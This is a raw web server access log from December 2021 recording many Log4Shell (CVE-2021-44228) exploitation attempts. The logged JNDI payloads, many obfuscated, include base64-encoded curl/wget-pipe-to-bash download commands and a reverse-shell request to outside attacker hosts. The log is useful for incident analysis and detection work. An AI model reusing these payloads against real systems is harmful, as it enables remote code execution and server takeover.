195.54.160.149 - - [14/Dec/2021:01:36:08 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.172.44.255 - - [14/Dec/2021:01:50:19 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://167.172.44.255:1389/Lazn}" "borchuk/3.1 ${jndi:ldap://167.172.44.255:1389/Lazn}"
194.48.199.78 - - [14/Dec/2021:12:14:13 +0000] "GET / HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/appel.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/appel.sh}"
128.90.61.199 - - [14/Dec/2021:13:42:09 +0000] "GET /$%7Bjndi:iiop://128.90.61.199:5456/1639489266%7D HTTP/1.1" 404 241 "${jndi:iiop://128.90.61.199:5456/1639489266}" "${jndi:iiop://128.90.61.199:5456/1639489266}"
128.90.61.199 - - [14/Dec/2021:13:42:11 +0000] "GET //$%7Bjndi:iiop://128.90.61.199:5456/1639489266%7D HTTP/1.1" 404 241 "${jndi:iiop://128.90.61.199:5456/1639489266}" "${jndi:iiop://128.90.61.199:5456/1639489266}"
157.245.108.125 - - [14/Dec/2021:21:21:51 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}"
195.54.160.149 - - [14/Dec/2021:21:31:34 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [14/Dec/2021:21:31:34 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
194.233.164.95 - - [15/Dec/2021:06:41:49 +0000] "GET / HTTP/1.1" 302 203 "${jndi:dns://50-116-41-48.scanworld.net/ref}" "${jndi:dns://50-116-41-48.scanworld.net/ua}"
172.104.152.7 - - [15/Dec/2021:10:10:18 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://172.104.152.7/a}"
107.170.69.93 - - [15/Dec/2021:11:24:42 +0000] "GET /${jndi:ldap://45.83.193.150:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
107.170.69.93 - - [15/Dec/2021:11:24:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.83.193.150:1389/Exploit}"
185.220.101.191 - - [15/Dec/2021:13:22:37 +0000] "GET /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D HTTP/1.1" 302 262 "${jndi:ldap://193.3.19.159:53/c}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
45.56.80.11 - - [15/Dec/2021:15:18:32 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://162.55.90.26/846473520/C}"
195.54.160.149 - - [15/Dec/2021:18:24:27 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [15/Dec/2021:18:24:27 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
139.59.70.139 - - [16/Dec/2021:02:58:17 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:443/}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:443/}"
195.54.160.149 - - [16/Dec/2021:05:22:24 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
139.59.70.139 - - [16/Dec/2021:05:56:20 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"
139.59.70.139 - - [16/Dec/2021:06:13:13 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"
195.54.160.149 - - [16/Dec/2021:14:50:58 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [16/Dec/2021:14:50:58 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
34.80.118.173 - - [16/Dec/2021:17:40:41 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
34.80.118.173 - - [16/Dec/2021:17:40:42 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
45.83.66.82 - - [17/Dec/2021:04:24:14 +0000] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-r6nowiqxeuo7ofx3%7D HTTP/1.1" 302 319 "${${::-j}ndi:dns://45.83.64.1/securityscan-dm2egfzz5rjlkg4q}" "${${::-j}ndi:dns://45.83.64.1/securityscan-nw5iv33sovrub3sa}"
137.184.218.211 - - [17/Dec/2021:05:14:08 +0000] "GET / HTTP/1.0" 400 226 "${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}" "ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}"
1.116.59.211 - - [17/Dec/2021:08:14:04 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
1.116.59.211 - - [17/Dec/2021:08:14:04 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
137.184.218.211 - - [17/Dec/2021:08:25:27 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/o=reference,payload=itzbenz.payload.RickRoll}" "borchuk/3.1 ${jndi:ldap://159.223.5.30:1389/o=reference,payload=itzbenz.payload.RickRoll}"
195.54.160.149 - - [17/Dec/2021:11:17:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [17/Dec/2021:11:17:53 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.83.66.20 - - [17/Dec/2021:15:23:42 +0000] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-76cc6qxmgtpsktk6%7D HTTP/1.1" 400 226 "${${::-j}ndi:dns://45.83.64.1/securityscan-jrkvebyqhye2ghdy}" "${${::-j}ndi:dns://45.83.64.1/securityscan-ufnjkk7ymvziepfo}"
62.76.41.46 - - [17/Dec/2021:20:57:40 +0000] "GET /?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo} HTTP/1.1" 302 358 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
62.76.41.46 - - [17/Dec/2021:20:57:41 +0000] "GET /?x=$%7bjndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
109.237.96.124 - - [17/Dec/2021:20:59:12 +0000] "GET /?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo} HTTP/1.1" 302 358 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
109.237.96.124 - - [17/Dec/2021:20:59:13 +0000] "GET /?x=$%7bjndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
170.210.45.163 - - [17/Dec/2021:21:04:05 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:21:04:05 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
95.173.156.193 - - [17/Dec/2021:22:13:34 +0000] "GET / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
95.173.156.193 - - [17/Dec/2021:22:13:34 +0000] "POST / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
95.173.156.193 - - [17/Dec/2021:22:13:35 +0000] "GET / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
195.54.160.149 - - [17/Dec/2021:22:44:13 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
36.138.125.108 - - [17/Dec/2021:23:11:15 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
36.138.125.108 - - [17/Dec/2021:23:11:16 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [18/Dec/2021:18:35:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
66.249.66.198 - - [19/Dec/2021:03:47:24 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 302 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.30 - - [19/Dec/2021:03:47:25 +0000] "GET /$%7Bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.54.160.149 - - [19/Dec/2021:03:53:00 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
178.176.203.190 - - [19/Dec/2021:07:46:10 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
